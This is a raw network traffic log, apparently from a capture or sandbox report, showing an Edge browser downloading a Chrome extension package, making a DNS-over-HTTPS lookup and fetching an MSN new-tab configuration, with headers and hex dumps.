2025-01-09 13:40:53 UTC	810	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:40:53 GMT Connection: close ews: PuwyymoQi+JtPN4ute+6ODpPd+ApSWsY9IWQJs6G8Wi2/wA3/Nkcmc/Wio/7MyGLdkzTj8aV5zw cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vwq3RGzr9NdxI9gGcukaosCMGm8dQXuwh061MSQzudWoYQ8yQ1gRCc7u5mym4sUMRQQsezQ%2Bfq4W9rw4nZq%2BLCNCSoY%2BZq1PLKGQoVK1nkBS8UXVaShTWVgTARi5gWLt%2FvRe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4d77bee0441a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1600&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1252&delivery_rate=1791411&cwnd=241&unsent_bytes=0&cid=86838c1ead657b6e&ts=334&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:03 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:41:03 UTC	563	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC60FXRFlnBRBQi3LEUQz5M9VCEpErAbNS4XBkrIk4uwQb-qy4IaP1uysfsIwpme-vjK Accept-Ranges: bytes Content-Length: 154477 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Wed, 08 Jan 2025 15:58:13 GMT Expires: Thu, 08 Jan 2026 15:58:13 GMT Cache-Control: public, max-age=31536000 Age: 78170 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-09 13:41:03 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2025-01-09 13:41:03 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:05 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:41:05 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:41:05 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:41:05 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4d7c44b773300-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:41:05 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 93 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:41:07 UTC	2843	OUT	GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250109.199&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-1s-twid%22,%22prg-1s-workid%22,%22prg-1sw-agfspf1%22,%22prg-1sw-aitt-dt%22,%22prg-1sw-bg-p2%22,%22prg-1sw-cc-calfeedi%22,%22prg-1sw-cgl1qr%22,%22prg-1sw-cmevlt%22,%22prg-1sw-crypinf%22,%22prg-1sw-cryptren%22,%22prg-1sw-ldny-transit%22,%22prg-1sw-reclaim%22,%22prg-1sw-reclaim2%22,%22prg-1sw-sa-capconf2t3%22,%22prg-1sw-sa-capwp1t5%22,%22prg-1sw-sa-dnet%22,%22prg-1sw-sa-sp7-tcc%22,%22prg-1sw-saccunifyv2t1%22,%22prg-1sw-sagervunipa%22,%22prg-1sw-tbrfltr%2 [TRUNCATED] Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:41:07 UTC	1806	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Server: Kestrel X-CRS-BuildVersion: 20241220.4_master X-CRS-Env: Production X-AS-SuppressSetCookie: 1 nel-report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA X-Ceto-ref: 677fd1f3d0314d13a5878115f5fa3a8b\|AFD:677fd1f3d0314d13a5878115f5fa3a8b\|2025-01-09T13:41:07.569Z Cache-Control: public, max-age=1728000 Date: Thu, 09 Jan 2025 13:41:07 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: sptmarket=en-gb\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=677fd1f3d0314d13a5878115f5fa3a8b.RefC=2025-01-09T13:41:07Z; expires=Sat, 09 Jan 2027 13:41:07 GMT; path=/ Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=184.28.190.52,b=1001040550,c=g,n=US_NJ_SECAUCUS,o=20940],[c=c,n=US_NJ_EDISON,o=20940],[a=52.142.29.118,c=o] Server-Timing: clientrtt; dur=2, clienttt; dur=73, origin; dur=33, cdntime; dur=40, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Miss from child, Miss from parent Akamai-Server-IP: 184.28.190.52 Akamai-Request-ID: 3baaaaa6 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Timing-Allow-Origin: * Akamai-GRN: 0.34be1cb8.1736430067.3baaaaa6 Vary: Origin
2025-01-09 13:41:07 UTC	14578	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 63 6f 6e 66 69 67 73 22 3a 7b 22 41 70 70 43 6f 6e 66 69 67 2f 64 65 66 61 75 6c 74 22 3a 7b 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 72 6f 6f 74 45 78 70 65 72 69 65 6e 63 65 22 3a 7b 22 63 6f 6e 66 69 67 52 65 66 22 3a 7b 22 65 78 70 65 72 69 65 6e 63 65 54 79 70 65 22 3a 22 45 64 67 65 43 68 72 6f 6d 69 75 6d 50 61 67 65 57 43 22 2c 22 69 6e 73 74 61 6e 63 65 53 72 63 22 3a 22 64 65 66 61 75 6c 74 22 7d 7d 7d 7d 2c 22 45 64 67 65 43 68 72 6f 6d 69 75 6d 50 61 67 65 57 43 2f 64 65 66 61 75 6c 74 22 3a 7b 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 64 61 74 61 43 6f 6e 6e 65 63 74 6f 72 73 22 3a 5b 7b 22 73 63 72 65 65 6e 57 69 64 74 68 22 3a 22 41 6e 79 22 2c 22 63 68 69 6c 64 72 65 6e 22 3a 5b 7b 22 69 6e 73 74 Data Ascii: 00006000{"configs":{"AppConfig/default":{"properties":{"rootExperience":{"configRef":{"experienceType":"EdgeChromiumPageWC","instanceSrc":"default"}}}},"EdgeChromiumPageWC/default":{"properties":{"dataConnectors":[{"screenWidth":"Any","children":[{"inst
2025-01-09 13:41:07 UTC	10008	IN	Data Raw: 62 75 74 69 6f 6e 22 3a 22 41 6d 61 7a 69 6e 67 20 41 65 72 69 61 6c 20 41 67 65 6e 63 79 2f 4f 66 66 73 65 74 20 62 79 20 53 68 75 74 74 65 72 73 74 6f 63 6b 22 2c 22 69 6d 61 67 65 22 3a 7b 22 69 31 30 30 22 3a 22 41 41 31 31 4d 44 65 4e 22 2c 22 69 32 34 30 22 3a 22 41 41 31 31 4e 39 6b 71 22 2c 22 69 37 32 30 22 3a 22 41 41 31 31 4e 62 4c 42 22 2c 22 69 31 30 38 30 22 3a 22 41 41 31 31 4e 32 4c 58 22 2c 22 69 31 34 34 30 22 3a 22 41 41 31 31 4d 53 6b 47 22 2c 22 69 32 31 36 30 22 3a 22 41 41 31 31 4e 65 79 71 22 7d 7d 2c 7b 22 61 74 74 72 69 62 75 74 69 6f 6e 22 3a 22 41 57 4c 20 49 6d 61 67 65 73 2f 4f 66 66 73 65 74 20 62 79 20 53 68 75 74 74 65 72 73 74 6f 63 6b 22 2c 22 69 6d 61 67 65 22 3a 7b 22 69 31 30 30 22 3a 22 41 41 31 31 4e 62 4c 43 22 2c Data Ascii: bution":"Amazing Aerial Agency/Offset by Shutterstock","image":{"i100":"AA11MDeN","i240":"AA11N9kq","i720":"AA11NbLB","i1080":"AA11N2LX","i1440":"AA11MSkG","i2160":"AA11Neyq"}},{"attribution":"AWL Images/Offset by Shutterstock","image":{"i100":"AA11NbLC",
2025-01-09 13:41:07 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-09 13:41:07 UTC	16384	IN	Data Raw: 30 30 30 30 34 33 46 44 0d 0a 69 31 30 38 30 22 3a 22 41 41 4f 45 35 38 42 22 2c 22 69 31 34 34 30 22 3a 22 41 41 4f 45 63 67 65 22 2c 22 69 32 31 36 30 22 3a 22 41 41 4f 45 68 58 58 22 7d 2c 22 76 69 64 65 6f 22 3a 7b 22 76 32 34 30 22 3a 22 35 31 61 34 66 34 64 64 2d 38 66 62 66 2d 34 65 37 65 2d 61 63 30 66 2d 38 34 65 63 65 66 61 38 38 38 36 39 2f 35 36 64 38 65 35 37 38 2d 34 32 31 34 2d 34 30 65 61 2d 62 32 36 31 2d 34 65 38 31 61 63 61 61 32 30 39 63 22 2c 22 76 37 32 30 22 3a 22 38 37 39 39 36 32 35 38 2d 37 31 30 64 2d 34 37 35 39 2d 39 63 35 65 2d 30 35 39 33 64 30 63 63 62 33 38 66 2f 34 63 61 30 36 61 66 65 2d 36 33 33 39 2d 34 32 64 62 2d 61 39 38 62 2d 36 32 31 64 33 34 39 33 34 64 37 64 22 2c 22 76 31 30 38 30 22 3a 22 66 65 31 33 66 31 33 Data Ascii: 000043FDi1080":"AAOE58B","i1440":"AAOEcge","i2160":"AAOEhXX"},"video":{"v240":"51a4f4dd-8fbf-4e7e-ac0f-84ecefa88869/56d8e578-4214-40ea-b261-4e81acaa209c","v720":"87996258-710d-4759-9c5e-0593d0ccb38f/4ca06afe-6339-42db-a98b-621d34934d7d","v1080":"fe13f13
